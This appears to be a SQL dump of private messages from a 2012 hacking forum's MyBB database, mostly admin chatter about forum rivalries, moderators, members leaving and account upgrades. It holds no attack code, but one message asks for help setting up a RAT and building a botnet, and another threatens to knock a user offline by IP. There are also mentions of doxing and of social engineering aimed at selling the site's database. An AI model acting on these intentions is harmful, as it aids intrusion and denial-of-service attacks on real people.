VALUES ('2875', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey...', '0', 'Hey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. Just my opinion :)[/align]', '1349826174', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2878', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey...', '0', '[quote=\'t3h jok3r\'] [quote=\'ƒ???????????g\'] Hey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. Just my opinion :)[/align] [/quote] True, closed. Can you bump some threads? [/quote] Yeh sure....(my phone is about to die lol fuck). But yeh u got threads on other forums?', '1349826343', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2881', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey...', '0', '[quote=\'t3h jok3r\'] [quote=\'ƒ???????????g\'] [quote=\'t3h jok3r\'] [quote=\'ƒ???????????g\'] Hey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. Just my opinion :)[/align] [/quote] True, closed. Can you bump some threads? [/quote] Yeh sure....(my phone is about to die lol fuck). But yeh u got threads on other forums? [/quote] What do you mean? [/quote] You said bump some threads lol. If you mean on the forum yeh. I\'ve been bumping all day :P. I would like to talk to you about promoting the forum and advertising at some point if that is cool. Maybe I can help purchase some ad space or something somewhere. We need to start building our member base :)', '1349826547', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3022', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking. [/quote] For onshore I could a cheap hosting but domain depends. [/quote] Oh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also. [/quote] Yeah I noticed. [/quote] Also is apathy still going to be an admin? [/quote] Giving him another chance he said he was away because of the thanksgiving. [/quote] You know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back. [/quote] Can I get a screenshot or something to back up myself while talking to him? [/quote] Nevermind it was on 10-9-12 but if you want that screenshot then I could get it for you. [/quote] When was the last post? [/quote] 10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy.', '1350094641', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3018', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: GIVEAWAY CONTEST', '0', '[quote=\'t3h jok3r\'] [quote=\'VirtualLegend\'] Hi, I have a new Thread about a Huge GIVEAWAY. I want that everyone is involved in the Contest, so thats why I\'m asking you can you PM everyone to go to my contest i will be glad if you do it and you will receive the Huge Ultimate Pack too. Thread: http://l33thacking.net/thread-822.html Bye, [/quote] I can\'t do a mass PM because if I do it for one person then everyone will ask me to mass PM others then it will get annoying to see spammed by PM but I can sticky the thread for you if you would like. [/quote] Okay thanks that you want to do still something for my thread', '1350094424', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2900', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey...', '0', '[quote=\'t3h jok3r\'] [quote=\'ƒ???????????g\'] [quote=\'t3h jok3r\'] [quote=\'ƒ???????????g\'] [quote=\'t3h jok3r\'] [quote=\'ƒ???????????g\'] Hey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. Just my opinion :)[/align] [/quote] True, closed. Can you bump some threads? [/quote] Yeh sure....(my phone is about to die lol fuck). But yeh u got threads on other forums? [/quote] What do you mean? [/quote] You said bump some threads lol. If you mean on the forum yeh. I\'ve been bumping all day :P. I would like to talk to you about promoting the forum and advertising at some point if that is cool. Maybe I can help purchase some ad space or something somewhere. We need to start building our member base :) [/quote] I totally agree with you. I\'m coming online in 4 minutes. [/quote] Oh sorry man had to go to work. Im on skype now if you wanna chat', '1349835272', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2904', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Dude... ', '0', 'Don\'t leave I know we did not start off on the right foot but I still think you are a great member. Dont go.', '1349841719', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3016', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking. [/quote] For onshore I could a cheap hosting but domain depends. [/quote] Oh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also. [/quote] Yeah I noticed. [/quote] Also is apathy still going to be an admin? [/quote] Giving him another chance he said he was away because of the thanksgiving. [/quote] You know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back. [/quote] Can I get a screenshot or something to back up myself while talking to him? [/quote] Nevermind it was on 10-9-12 but if you want that screenshot then I could get it for you.', '1350094359', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2908', '249', '1', '249', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Moving', '0', '[quote=\'t3h jok3r\'] I saw your post on the thread in which you stated that you left Anarchy and I\'m sure you read my reply too. Now what I would like to know is why did you exactly leave AF? [/quote] Anar was being a dick. He went raving around saying that t3h jok3r from L33tHacking had DoXed one of his own members and that he was scammed 30 bucks for buying your site. I really couldn\'t believe that somebody would fall for buying a site like this for 30 bucks. It\'s absolutely ridiculous. After I said that to The Anarchist, he banned my account, so then I posted here and found that he was guilty otherwise he would never had done so, but then he must of had an account here *obviously* and unbanned my account to make you think I was some idiot or something.', '1349856803', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2910', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Unique', '0', 'can you change the forum icon to this? http://i.imgur.com/qvfmJ.png thanks alot bro.', '1349863210', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2912', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Mod', '0', 'I have done what you asked ', '1349876526', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3013', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking. [/quote] For onshore I could a cheap hosting but domain depends. [/quote] Oh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also. [/quote] Yeah I noticed. [/quote] Also is apathy still going to be an admin? [/quote] Giving him another chance he said he was away because of the thanksgiving. [/quote] You know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back.', '1350093925', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2928', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'NeonLights', '0', 'Neonlights just said he is leaving LH because you are giving him an attitude and getting a new leader for his group. He said it in the group chat.', '1349919385', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3038', '255', '1', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hello', '0', 'hello please upgrade my acount , so that i become able to post premium link.', '1350100726', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3034', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking. [/quote] For onshore I could a cheap hosting but domain depends. [/quote] Oh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also. [/quote] Yeah I noticed. [/quote] Also is apathy still going to be an admin? [/quote] Giving him another chance he said he was away because of the thanksgiving. [/quote] You know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back. [/quote] Can I get a screenshot or something to back up myself while talking to him? [/quote] Nevermind it was on 10-9-12 but if you want that screenshot then I could get it for you. [/quote] When was the last post? [/quote] 10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy. [/quote] Well OK then ;) [/quote] Does that help you? [/quote] Nope, it basically backups his story which means that he was out of town. BTW do you know the user Monkey? [/quote] Nope [/quote] ok, I don\'t know why but I sleepy already. It\'s like 10 now and I normally sleep at 2. [/quote] Oh damn [/quote] Glowing is definitely Neon because neon lights are always glowing. Greed is a legit member from ubers Monkey is some SOB trying to SE Apathy to sell him my sites DB but luckily Apathy can\'t download backups. [/quote] IP BAN HIS ASS AND GIVE ME HIS FUCKING IP I WILL HIT HIM OFFLINE', '1350096662', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3041', '255', '1', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\'] [quote=\'sbhshroy2\'] hello please upgrade my acount , so that i become able to post premium link. [/quote] Hey there. Thanks for joining my website and I have upgraded your account. [/quote] thanks.', '1350101621', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3043', '255', '1', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'i have a question related to postin a thread', '0', 'can i post premium acount with adf.ly link.', '1350102042', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2935', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: my group section fucking deleted?', '0', '[quote=\'t3h jok3r\'] [quote=\'NeonLights\'] [quote=\'t3h jok3r\'] [quote=\'NeonLights\'] ok so im already pissed and now i noticed my gourp section is deleted and al my fucking threads that i made also -.- took me for fucking ever to make... [/quote] Guess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it. You want to fucking have attitude then go for it because now ratters will have a new leader. [/quote] fine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this... and there was nothing in that section and its ur fault so dont get moody for shit... [/quote] [/quote] Welp', '1349919707', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4005', '160', '5', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Hey Guys', '0', 'Do you want to help me set up the RAT, and build a BotNet?', '1351959334', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2940', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: my group section fucking deleted?', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'NeonLights\'] [quote=\'t3h jok3r\'] [quote=\'NeonLights\'] ok so im already pissed and now i noticed my gourp section is deleted and al my fucking threads that i made also -.- took me for fucking ever to make... [/quote] Guess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it. You want to fucking have attitude then go for it because now ratters will have a new leader. [/quote] fine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this... and there was nothing in that section and its ur fault so dont get moody for shit... [/quote] [/quote] Welp [/quote] What? [/quote] We lost a member', '1349919959', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2943', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: my group section fucking deleted?', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'NeonLights\'] [quote=\'t3h jok3r\'] [quote=\'NeonLights\'] ok so im already pissed and now i noticed my gourp section is deleted and al my fucking threads that i made also -.- took me for fucking ever to make... [/quote] Guess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it. You want to fucking have attitude then go for it because now ratters will have a new leader. [/quote] fine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this... and there was nothing in that section and its ur fault so dont get moody for shit... [/quote] [/quote] Welp [/quote] What? [/quote] We lost a member [/quote] True he was really active. We lost two great members :\'( Neonlight has a lot of attitude so he was going to get banned someday because if he couldn\'t stay on HF, ubers and other hacking communities then staying on LH is a mission. He gets banned everywhere for having too much attitude. Be honest this time was it my fault? [/quote] No it wasnt, He messaged you with an attitude', '1349920349', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2989', '100', '5', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Timmy\'s Hackpack', '0', '[quote=\'Timmy\'] [quote=\'??zg???g????61\'] Hey bro, the link in your post that you gave out for your 2GB \"Hackpack\" is down, do you think you could make a mediafire or something and send this too me? I\'d seriously appreciate it. [/quote] Sorry but I don\'t have them anymore. [/quote] D: darn alright thanks anyway.', '1350054297', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2946', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] Sup what\'s wrong man you have been inactive recently and away from L33THacking for a couple of days. [/quote] There was thanks giving and I went away to see relatives. :3', '1349930097', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2948', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Unique', '0', '[quote=\'t3h jok3r\'] [quote=\'R?????zo?\'] can you change the forum icon to this? http://i.imgur.com/qvfmJ.png thanks alot bro. [/quote] Consider it done. [/quote] thanks alot bro.', '1349945450', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2950', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: mod', '0', 'Nothing has Changed :P', '1349957566', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2952', '228', '205', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'Thread', '0', 'Check my new Thread: http://l33thacking.net/thread-807.html', '1349958964', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2954', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Thread', '0', 'Check my new Thread: http://l33thacking.net/thread-807.html', '1349959004', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2977', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need you to do me a favor.', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] Sure thing, Ill make sure to watch him daily, But I can\'t view PMs. [/quote] Don\'t stalk him unless you are free, just keep checking his profile and by the online thing it will tell you if he is sending a PM and whose profile he is viewing. [/quote] Will do.', '1350004539', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2964', '100', '5', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Timmy\'s Hackpack', '0', 'Hey bro, the link in your post that you gave out for your 2GB \"Hackpack\" is down, do you think you could make a mediafire or something and send this too me? I\'d seriously appreciate it.', '1349975984', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2974', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need you to do me a favor.', '0', 'Sure thing, Ill make sure to watch him daily, But I can\'t view PMs.', '1350004450', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3046', '255', '1', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: i have a question related to postin a thread', '0', '[quote=\'t3h jok3r\'] [quote=\'sbhshroy2\'] can i post premium acount with adf.ly link. [/quote] Yeah adf.ly links are allowed but survey links are not allowed on L33THacking. [/quote] ok.', '1350102193', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3049', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Domain Register', '0', 'Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.', '1350109758', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3053', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'HELP please', '0', 'SORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING ON UBER FORUMS I KNOW HOW TO ', '1350117047', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3055', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'gamers crew please', '0', 'hey i want to join the gamers crew my username is treyz123456789 thanks pm me back', '1350118047', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3057', '254', '258', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Hey', '0', 'I want to know something, Are you just trying to troll me? or something because thats not cool. I just want to know, I\'m not a guy who goes posting spreading and dissing people, I rather handle it face to face.', '1350125361', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3059', '258', '254', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Re: Hey', '0', '[quote=\'Greed\'] I want to know something, Are you just trying to troll me? or something because thats not cool. I just want to know, I\'m not a guy who goes posting spreading and dissing people, I rather handle it face to face. [/quote No im not trying to troll anyone , I thought you were trolling me with the hole greed Thingy', '1350125483', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3061', '254', '258', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: Hey', '0', '[quote=\'XTr3ME PiX3L\'] [quote=\'Greed\'] I want to know something, Are you just trying to troll me? or something because thats not cool. I just want to know, I\'m not a guy who goes posting spreading and dissing people, I rather handle it face to face. [/quote No im not trying to troll anyone , I thought you were trolling me with the hole greed Thingy [/quote] no lol, I was joking, If I were the real thing I wouldn\'t be on here right now.', '1350125583', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3063', '257', '61', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'hey how do i +rep people', '0', 'hey i dont know hoe to +rep people ', '1350132085', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` 